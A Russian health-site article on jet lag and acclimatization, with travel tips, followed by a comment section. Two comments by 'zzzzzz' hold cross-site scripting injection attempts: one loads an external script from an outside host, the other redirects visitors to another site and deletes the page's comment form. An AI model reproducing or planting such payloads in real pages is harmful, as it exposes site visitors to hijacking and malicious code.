Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что такое акклиматизация  >>  Что такое акклиматизация
 
Обратная связь
 

Что такое акклиматизация

Размер шрифта
21 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Чувствуете себе усталым и «разбитым» после длительного перелета? Не беспокойтесь, ваше состояние вполне объяснимо.

Что такое акклиматизация

Если после длительного перелета, вы чувствуете себя усталым, а ваше сознание кажется спутанным, то у вас состояние известное под названием синдром смены часовых поясов. Не беспокойтесь, это состояние испытывают многие путешественники, которые прибывают в новую временную зону.

Синдром смены часовых поясов – это результат нарушения работы «часов» организма или естественных суточных биоритмов. Эти внутренние часы работают 24 часа в сутки, 7 дней в неделю и контролируют сон, бодрствование и другие физиологические процессы, в том числе голод, пищеварение, дефекацию, температуру тела и кровяное давление.

Изменение окружающей среды, смена светового дня (при путешествии со смещением часовых зон), перепады температуры (при путешествии из зимы в лето) могут драматически влиять на суточные биоритмы, посеяв смуту в вашем разуме и организме.

Сам полет на самолете тоже может негативно повлиять: внутри лайнера поддерживается необходимое давление, тогда как вне его давление очень низкое. Это означает, что количество кислорода, поступающего в кровеносную систему, становится на 5-20% меньше. Из-за этого вы можете чувствовать себя вялым и обезвоженным, испытывать сонливость во время полета.

К сожалению, нам неподвластен контроль поглощаемого кислорода во время полета, а также мы никак не можем влиять на смену дня и ночи, зимы и лета из-за перемещения в пространстве, но есть факторы, которые помогут значительно проще пережить акклиматизацию. Старайтесь во время полета пить достаточное количество жидкости, чтобы избежать обезвоживания, сонливости и головных болей. Также за несколько дней до перелета старайтесь высыпаться.

Откажитесь от употребления тяжелой пищи, алкоголя и кофеина за несколько дней до путешествия, это значительно облегчит перелет. А по прилету в пункт назначения постарайтесь провести некоторое время на солнце, так как солнечный свет помогает перенастроить биоритмы.    

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Менструальные болезни. ПМС   Хотите не чувствовать боли – спите дольше   Авиаперелеты и расстройство биоритмов   Выбирайте матрас правильно  
30 января 2013Хотите не чувствовать боли – спите дольше 15 июля 2013Сколько нужно спать, чтобы помнить все
 
02 июля 2013Лечить головную боль можно без лекарств! Ученые подключают электричество к нервам! 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 

Слайдшоу

1
Самые неожиданные причины усталости
Как заняться любовью с болезнью легких
Проблемы, с которыми справится секс. Часть 4

Тесты

1
Хорошо ли Вы спите?
Что вы знаете о воде?
Знаете ли вы свой язык
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.